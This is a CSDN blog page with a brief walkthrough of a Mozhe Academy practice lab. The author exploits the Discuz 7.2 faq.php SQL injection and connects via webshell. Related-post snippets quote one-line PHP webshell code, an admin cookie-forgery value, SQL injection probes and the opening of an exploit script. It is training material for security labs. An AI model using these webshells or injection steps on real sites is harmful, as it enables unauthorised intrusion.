墨者学院 - CMS系统漏洞分析溯源(第9题)

最新推荐文章于 2024-07-22 18:51:06 发布

yEss5Lq

最新推荐文章于 2024-07-22 18:51:06 发布

阅读量1.2k

点赞数 1

分类专栏：墨者学院文章标签：墨者学院

本文链接：https://blog.csdn.net/qq_37867012/article/details/86761048

版权

墨者学院专栏收录该内容

1 篇文章 0 订阅

订阅专栏

CMS系统漏洞分析溯源(第9题)

本题就是利用了discuz 7.2 中的faq.php文件sql注入漏洞的一个0day

下载exp 利用
在这里插入图片描述

admin用户的密码无法破解，所以直接用webshell的链接就可以了

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yEss5Lq

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

墨者学院_CMS系统漏洞分析溯源(第9题)

weixin_50698958的博客

09-23

622

漏洞概述：在一、pandas是什么？示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。二、使用步骤 1.引入库代码如下（示例）： import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._

墨者学院 - CMS系统漏洞分析溯源(第5题)

多崎巡礼的博客

10-29

1608

phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?> 判断如果没有admin_na...

1 条评论您还未登录，请先登录后发表或查看评论

墨者学院-CMS系统漏洞分析溯源(第9题)

ploto_cs的博客

10-15

706

一.解题思路查询版本，直接使用工具破解二.操作步骤 1.浏览网址可以看到版本号为Discuz 7.2 2.利用工具查看是否存在漏洞使用工具dz7.x_faq.py 源码为： #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf-8 -*- # author iswin import sys import hashlib import time import math import base64 import

墨者学院（4个sql靶场攻略）

最新发布

2201_75891821的博客

07-22

1689

墨者学院 4种sql注入漏洞的解答简单易理解不复杂

Python Discuz 7.2 faq.php 注入漏洞全自动利用工具

weixin_33912638的博客

04-03

219

#!/usr/bin/envpython #-*-coding:gbk-*- #-*-coding:gb2312-*- #-*-coding:utf_8-*- #authoriswin importsys importhashlib importtime importmath importbase64 importurllib2...

墨者学院-WebShell代码分析溯源(第9题)

JimWu的博客

09-04

211

WebShell代码分析溯源(第9题) 难易程度:★★ 题目类型:代码审计使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页，下载网页源代码。 2.根据最后的修改时间，确定可疑的文件。 3.打开文件，发现是一句话木马病毒。 register_shutdown_function函数是在代码执行完成后执行的，所以当e=assert时，把$_REQUES...

墨者学院 - WebShell代码分析溯源(第9题)

多崎巡礼的博客

08-05

820

审查代码 1、先找到黑页所在目录，观察同层级的其他文件命名和修改时间，选中可疑文件审计代码 2、没有新的发现，就去目录查找，根据最后的修改时间排查。 <?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']); ...

墨者学院-CMS系统漏洞分析溯源(第4题)

JimWu的博客

09-04

821

CMS系统漏洞分析溯源(第4题) 难易程度:★★★ 题目类型:身份认证和会话管理使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场，用wwwscan扫一下。发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp，显示还没有登陆。 3.使用cookie-editor，伪造cookie，添加use...

墨者学院-CMS系统漏洞分析溯源(第7题)

JimWu的博客

09-04

976

CMS系统漏洞分析溯源(第7题) 难易程度:★★ 题目类型:CMS漏洞使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场，先在网上查一下dedecms的漏洞。知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫，然后打开burpsuite，访问/member/resetpassword.php，截包。我们send to repeater，修改get的参数 ?...

墨者学院 - CMS系统漏洞分析溯源(第4题)

多崎巡礼的博客

10-09

1050

使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...

墨者学院 - CMS系统漏洞分析溯源(第3题)

多崎巡礼的博客

10-29

1390

新云网站内容管理系统是一套开源的WEB网站管理系统，采用目前非常成熟的ASP+Access/SQL开发而成。使用它，我们可以很方便的管理自己的网站，目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。新云的问吧是类似百度知道的互动知识问答分享平台，问吧采用自己的数据库，数...

CMS系统漏洞分析溯源(第5题)

cc_de_csdn的博客

08-25

379

1.由提示可以知道本题需要我们不使用密码登录 2.打开靶场，使用御剑扫描，发现一个/admin/的后台地址页面 3.通过资料了解到这个php通过校验访问的cookie，使用cookie edit修改cookie，添加admin_name，value随意 4.访问/admin/cms_admin.php，进入后台 5.拉倒网页最下面拿到KEY ...

墨者学院-XWAY科技管理系统V3.0

lianliandad的博客

09-15

3416

妙啊

墨者学院 - 密码学加解密实训(Zip伪加密)

多崎巡礼的博客

09-18

1706

zip格式文件伪加密实践是检验真理的唯一标准简介 zip文件是一种压缩文件，可进行加密，也可不加密。而伪加密是在未加密的zip文件基础上修改了它的压缩源文件目录区里的全局方式位标记的比特值，使得压缩软件打开它的时候识别为加密文件，提示输入密码，而在这个时候，不管你用什么软件对其进行密码破解，都无法打开它！这就是它存在的意义！ zip官方文档zip中文详解文件组成压缩源...

墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看（超详细）

kitiu666的博客

08-26

4199

2020年8月25日，第五次渗透测试。通过对sql语句进行注入，数据库的库名，表名，字段进步爆破，最终获得key。准备需求： 1.windows系统pc 2.2.burpsuite（bp）抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...

墨者学院 - WebShell代码分析溯源(第1题)

多崎巡礼的博客

07-27

1291

下载源码使用seay源代码审计系统扫一扫（实在不想一个个去看。。。） seay源代码审计系统：https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg 下载出源代码，找到cn-right.php <?php error_reporting(0); $_GET['POST']($_POST['GET']); ?> ...

墨者学院-SQL手工注入漏洞测试(MySQL数据库)教程

weixin_57682301的博客

07-22

213

在地址栏输入 and 1=1--+判断是否有sql注入，当1=2时页面消失证明网页有SQL注入。使用联合查询将有回显的数值改为你要查看的数据库信息，下图找出了数据库名以及数据表名。使用order by判断有几列，当order by为5时页面消失，证明有4列。可以看出密码是md5加密过的，在网上找个解密就可以找到密码了。根据给出的name以及password查出数据表中的值。首先启动环境进入页面，点击下方公告。再使用数据表名查出表中各列的名。

【墨者学院】WebShell文件上传漏洞分析溯源(第2题)

m0_66835614的博客

11-28

1268

【墨者学院】WebShell文件上传漏洞分析溯源(第2题)

墨者学院 - CMS系统漏洞分析溯源(第2题)

多崎巡礼的博客

08-06

1364

登陆后台。使用admin.php就可以进入后台用户名密码都是自动填上的，直接登陆就可以。界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。 ...

墨者-sql手工注入漏洞测试

04-29

墨者安全团队是一支专注于网络安全领域的团队，他们致力于网络安全研究和技术推广。其中，手工注入漏洞测试是他们的一项重要工作之一。在进行手工注入漏洞测试时，墨者安全团队通常会通过一系列的步骤来进行测试。首先，他们会对目标网站进行初步信息收集，包括了解目标网站的架构、数据库类型、应用程序等等。然后，他们会通过手工注入的方式对目标网站进行攻击，以确定是否存在注入漏洞，并尝试获取敏感信息。在手工注入的过程中，墨者安全团队通常会使用一些工具来辅助测试，例如Burp Suite、SQLMap等。同时，他们也会根据目标网站的具体情况进行一些自定义的测试，以提高测试效果。总的来说，墨者安全团队的手工注入漏洞测试方法比较系统和全面，可以有效地发现目标网站中存在的注入漏洞，从而帮助企业提高网络安全防护水平。